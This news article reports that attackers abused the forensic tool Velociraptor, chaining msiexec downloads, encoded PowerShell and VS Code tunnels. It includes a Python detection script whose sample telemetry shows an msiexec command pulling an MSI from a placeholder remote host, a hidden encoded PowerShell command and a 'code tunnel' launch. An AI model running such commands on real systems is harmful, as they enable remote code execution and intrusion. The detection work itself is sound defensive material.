Red Hot Cyber
Cybersecurity, Cybercrime News and Vulnerability Analysis
Attackers are using Velociraptor for cyberattacks. Rapid7 is aware

5 September 2025 12:30

Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints.

“In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” Sophos Counter Threat Unit experts said.

The report emphasizes that attackers often employ “living-off-the-land” (LotL) tactics and use legitimate remote monitoring and management tools in attacks, but the use of Velociraptor signals an evolution of such tactics, in which incident response software itself is being misused for malicious purposes.

Analysis of the incident showed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which also served as a staging area for other tools used by the attackers, including the Cloudflare tunneling tool and the Radmin remote administration utility.

The MSI file was designed to deploy Velociraptor, which would then communicate with another Cloudflare Workers domain. The access was then used to download Visual Studio Code from the same staging server using an encoded PowerShell command and run it with the tunneling option enabled to allow both remote access and remote code execution.

Additionally, the attackers were observed reusing the Windows msiexec utility to download additional payloads. “Organizations should monitor and investigate unauthorized use of Velociraptor and consider the use of such tactics as a precursor to ransomware distribution,” Sophos warns.
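The chain described above (msiexec fetching an MSI from a remote URL, Velociraptor started from that installer rather than as a service, an encoded PowerShell command, and VS Code launched with its tunnel option) is easy to express as process-creation detections. The following is an added example written for this article; it is not Sophos's or Rapid7's code, and every path, parent-process relationship and domain in the sample telemetry is constructed for illustration, not an indicator from the report. The "Velociraptor not started by services.exe" heuristic is an assumption that sanctioned deployments run it as a Windows service.

```python
"""Process-creation detections for the Velociraptor abuse chain.

Added example (not from the original report). Input events mimic parsed
Sysmon Event ID 1 / EDR telemetry: image, command line, parent image.
All sample values are constructed placeholders.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    cmdline: str
    parent: str = ""


# Constructed sample telemetry; the workers.dev host is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i https://staging-placeholder.workers.dev/agent.msi /qn",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Program Files\Velociraptor\velociraptor.exe",
              r"velociraptor.exe --config client.config.yaml client",
              r"C:\Windows\System32\msiexec.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -nop -w hidden -enc SQBuAHYAbwBrAGUA",
              r"C:\Program Files\Velociraptor\velociraptor.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\bin\code.exe",
              r"code.exe tunnel --accept-server-license-terms",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # Benign controls: a local MSI install and a normal VS Code launch.
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Temp\7zip.msi /qn",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Program Files\Microsoft VS Code\Code.exe",
              r"Code.exe C:\src\project",
              r"C:\Windows\explorer.exe"),
]

# msiexec pulling its package over HTTP(S) instead of from a local path.
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\b.*\bhttps?://", re.I)
# VS Code started with the 'tunnel' subcommand (remote access/RCE path).
VSCODE_TUNNEL = re.compile(r"\bcode(?:\.exe)?\b.*\btunnel\b", re.I)
# PowerShell with an encoded command (-e / -ec / -enc / -EncodedCommand).
ENCODED_PS = re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\b", re.I)
VELOCIRAPTOR = re.compile(r"velociraptor", re.I)

# Assumption: sanctioned Velociraptor clients run as a service under services.exe.
EXPECTED_VELO_PARENT = r"\services.exe"


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection labels that fire on a single event."""
    hits: list[str] = []
    if REMOTE_MSI.search(ev.cmdline):
        hits.append("msiexec_remote_url")
    if VELOCIRAPTOR.search(ev.image) and not ev.parent.lower().endswith(EXPECTED_VELO_PARENT):
        hits.append("velociraptor_unexpected_parent")
    if ENCODED_PS.search(ev.cmdline):
        hits.append("powershell_encoded")
    if VSCODE_TUNNEL.search(ev.cmdline):
        hits.append("vscode_tunnel")
    return hits


CHAIN_STAGES = {"msiexec_remote_url", "velociraptor_unexpected_parent",
                "powershell_encoded", "vscode_tunnel"}


def triage(events: list[ProcEvent]) -> dict:
    """Correlate per-event hits for one host and rate the whole sequence.

    Several distinct stages of the chain on one host is what the report
    says to treat as a possible ransomware precursor, so that earns 'high'.
    """
    hits: dict[str, list[int]] = {}
    for idx, ev in enumerate(events):
        for label in classify(ev):
            hits.setdefault(label, []).append(idx)
    stages = len(CHAIN_STAGES & hits.keys())
    severity = "high" if stages >= 3 else "medium" if stages >= 1 else "none"
    return {"hits": hits, "stages": stages, "severity": severity}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for label, idxs in result["hits"].items():
        print(f"{label}: events {idxs}")
    print(f"distinct chain stages: {result['stages']} -> severity {result['severity']}")
```

The benign controls show why each rule keys on the suspicious argument rather than on the binary: a local MSI install and an ordinary VS Code launch produce no hits, while the four constructed chain events each fire exactly one label and together escalate to "high". In a real deployment the Velociraptor rule should be paired with an inventory of hosts and service accounts that are sanctioned to run it, since parent-process heuristics alone will not distinguish a rogue agent from an unusual but legitimate install.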

Following Sophos’s publication of this report, security firm Rapid7, which develops Velociraptor, published a white paper that details how organizations can detect Velociraptor misuse in their environments.

“Rapid7 is aware of reports of abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response purposes. But like many other security and administrative tools, it can be used for malicious purposes if it falls into the wrong hands,” the developers comment.


Agostino Pellegrino
He is a freelancer, teacher and expert in Computer Forensics, Cyber Security, Ethical Hacking and Network Management. He has collaborated with leading educational institutions internationally and has taught and mentored advanced Offensive Security techniques for NATO, receiving major awards from the U.S. Government. His motto is "Study. Always."
Areas of Expertise: Cybersecurity architecture, Threat intelligence, Digital forensics, Offensive security, Incident response & SOAR, Malware analysis, Compliance & frameworks